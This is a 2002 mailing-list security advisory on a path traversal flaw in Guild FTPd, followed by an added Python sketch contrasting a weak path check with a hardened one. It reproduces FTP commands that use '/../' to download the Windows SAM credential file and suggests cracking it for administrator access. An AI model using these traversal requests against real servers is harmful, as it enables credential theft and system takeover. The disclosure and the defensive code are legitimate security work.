From: full-disclosure at mike-c.com (Mike C)
Subject: Guild FTPd Exploit
______________________________________________________________________
Product Information
Guild FTPd 0.999.5
Released 4th July 2002
http://www.nitrolic.com
Guild FTPd is an ftp server which is growing ever more popular due to
its link with IRC. It can detect if the people on your FTP are in
the same channels you are, and kick/ban them accordingly. This is
useful if you wish to keep your ftp data a little more private.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
____________________________________________________________
Exploit Information
Author: Mike C
Date: 7th September 2002
Description:
Using a simple exploit in Guild FTPd, we can download any
file on the same hard drive as the ftp root folder.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
__________________________________________________
SAM SECURITY FILE
LOCAL PATH = C:\windows\repair\sam
FTP ROOT = C:\ftp
RELATIVE PATH = ../windows/repair/sam
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
1) We try to download the sam file using a relative path to the ftp root
ftp> GET "../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576 bytes).
425 Download failed.
ftp>
2) We get a 'Download failed' message, along with a filesize,
confirming the file exists. If the file doesn't exist, we get
'Access denied: File not found.'
3) Adding a / to the start of the relative path seems to bypass the
server's security check on relative paths. Note, however, that the
leading / does not confine the request to the ftp root as you may expect.
Where '../foo.bar' is not accessible, '/../foo.bar' is.
ftp> GET "/../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576 bytes).
226 Transfer complete. 24576 bytes in 1 sec. (24.58 Kb/s).
ftp: 24576 bytes received in 2.08Seconds 11.80Kbytes/sec.
ftp>
4) We have just successfully exploited the server, managing to
download the system's sam file. An application such as l0phtcrack
(http://www.atstake.com/research/lc/) could now be used to find
the passwords, thus giving full administrative access to the
exploited system.
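As an added illustration, not part of the original post or of Guild FTPd's code, the following hypothetical Python compares a prefix-only check that would behave as observed above (refusing '../x' but serving '/../x') with a canonicalise-then-confine check that resolves the request against the ftp root before deciding. The root and file paths are constructed to match the advisory; the naive check is an assumption about the kind of bug involved, not the server's actual code.

```python
import posixpath
from typing import Optional

# Constructed values mirroring the advisory: the ftp root and the target file.
FTP_ROOT = "C:/ftp"
SAM_FILE = "C:/windows/repair/sam"


def naive_resolve(root: str, requested: str) -> Optional[str]:
    """Hypothetical weak check: refuse only requests that *start* with "..".

    "../windows/repair/sam" is refused, but "/../windows/repair/sam" passes,
    the leading "/" is stripped, and the remaining ".." still walks out of
    the root once the path is joined. This mirrors the observed behaviour.
    """
    if requested.startswith(".."):
        return None
    return posixpath.normpath(root + "/" + requested.lstrip("/"))


def safe_resolve(root: str, requested: str) -> Optional[str]:
    """Hardened check: canonicalise first, then confine to the root.

    1. Treat backslashes as separators (the server runs on Windows) and
       strip leading slashes, so "/x" means "<root>/x", never the drive root.
    2. Collapse "." and ".." segments with normpath.
    3. Accept only if the result is the root itself or lies beneath it;
       comparing against root + "/" avoids the "C:/ftp" vs "C:/ftpx" trap.
    """
    root = posixpath.normpath(root.replace("\\", "/"))
    rel = requested.replace("\\", "/").lstrip("/")
    resolved = posixpath.normpath(posixpath.join(root, rel))
    if resolved == root or resolved.startswith(root + "/"):
        return resolved
    return None  # request escapes the ftp root: refuse it


if __name__ == "__main__":
    for req in ("../windows/repair/sam", "/../windows/repair/sam", "pub/file.txt"):
        print(f"{req!r:32} naive={naive_resolve(FTP_ROOT, req)!r:28} "
              f"safe={safe_resolve(FTP_ROOT, req)!r}")
```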
______________________________________________________________________
Vendor Status:
The authors of Guild FTPd were notified on 7th September 2002.
The exploit has been fixed as of 8th September 2002.
A new version will be released on 15th September 2002.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯